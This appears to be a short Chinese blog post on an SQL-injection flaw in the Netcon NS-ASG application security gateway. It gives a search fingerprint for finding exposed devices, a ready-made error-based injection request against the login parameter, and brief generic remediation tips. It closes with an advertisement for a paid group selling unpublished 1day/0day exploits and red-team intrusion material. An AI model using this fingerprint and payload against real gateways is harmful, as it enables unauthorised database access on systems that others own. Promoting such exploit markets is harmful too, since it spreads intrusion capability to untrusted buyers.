SQL注入（SQLi）是一种网络安全漏洞，允许攻击者干扰应用程序对其数据库的查询。通过浏览器或者其他客户端将恶意SQL语句插入到网站参数中，而网站应用程序未对其进行过滤，SQL语句带入数据库使恶意SQL语句得以执行可以查看通常无法检索的数据。这可能包括属于其他用户的数据，或应用程序本身能够访问的任何其他数据。在许多情况下，攻击者可以修改或删除这些数据，从而导致应用程序的内容或行为发生持续变化。

‍

title:"网康-NS-ASG-应用安全网关"

POC

check_username=123&check_username1=123&check_passwd=123&action=login_check&check_VirtualSiteId=1/**/and/**/updatexml(1,concat(0x7e,(md5(123))),3)#&imgcode=undefined&selvalue=2&BackgroundName=background.gif

1..对进入数据库的特殊字符（’”<>&*;等）进行转义处理，或编码转换。

2.确认每种数据的类型，比如数字型的数据就必须是数字，数据库中的存储字段必须对应为int型。

3.数据长度应该严格规定，能在一定程度上防止比较长的SQL注入语句无法正确执行。

4.避免网站显示SQL错误信息，比如类型错误、字段不匹配等，防止攻击者利用这些错误信息进行一些判断。

5.过滤危险字符，例如：采用正则表达式匹配union、sleep、and、select、load_file等关键字，如果匹配到则终止运行。

        需要加入内部知识星球可点击下方链接，内部包含但不限于网上未公开的1day/0day，2024最新企业SRC/CNVD/Edu实战挖掘技巧报告，红队外网打点、红队内网横向渗透。内部干货多及渗透思路很多，对新人友好，实战报告赏金几百到几千不等，加入圈子拥有FOFA、shadan、360Quake、ZoomEye、Hunter、CTFshow、Tide等等高级会员，安全培训教程，某机构红队教程，SRC挖掘培训课，SRC文档，武器库。圈子里面资料价值至少在10K以上，目前星球内部主题300+，资源2000+，其他和网盘资源1w+覆盖全网星球、纷传90%以上内容并持续更新中，越早加入价格越低。(详情点击下方地址了解-->>还是觉得价格贵的师傅后台回复" 星球 "有优惠券使用名额有限先到先得)

点击了解-->>内部VIP知识星球福利介绍V1.2版本-元旦优惠